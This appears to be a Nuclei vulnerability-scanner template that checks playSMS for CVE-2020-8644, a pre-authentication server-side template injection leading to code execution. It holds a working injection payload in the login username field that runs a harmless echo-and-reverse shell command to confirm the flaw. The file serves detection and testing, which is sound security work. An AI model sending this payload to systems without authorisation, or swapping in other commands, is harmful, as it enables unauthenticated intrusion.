id: CVE-2020-8644

info:
  name: playSMS - Pre-Authentication Remote Code Execution (CVE-2020-8644)
  author: dbrwsky
  severity: critical
  description: PlaySMS double processes a server-side template, resulting in unauthenticated user control of input to the PlaySMS template engine. The template engine's implementation then permits arbitrary code execution.
  reference:
    - https://research.nccgroup.com/2020/02/11/technical-advisory-playsms-pre-authentication-remote-code-execution-cve-2020-8644/
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8644
    - https://playsms.org/2020/02/05/playsms-1-4-3-has-been-released/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-8644
    cwe-id: CWE-74
  tags: cve,cve2020,ssti,playsms,rce,unauth

requests:
  - raw:
      - |
        GET /index.php?app=main&inc=core_auth&route=login HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}

      - |
        POST /index.php?app=main&inc=core_auth&route=login&op=login HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
        Content-Type: application/x-www-form-urlencoded

        X-CSRF-Token={{csrf}}&username=%7B%7B%60echo%20%27CVE-2020-8644%27%20%7C%20rev%60%7D%7D&password=

    cookie-reuse: true
    redirects: true
    max-redirects: 2

    extractors:
      - type: xpath
        name: csrf
        part: body
        attribute: value
        internal: true
        xpath:
          - /html/body/div[1]/div/div/table/tbody/tr[2]/td/table/tbody/tr/td/form/input

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '4468-0202-EVC'

      - type: status
        status:
          - 200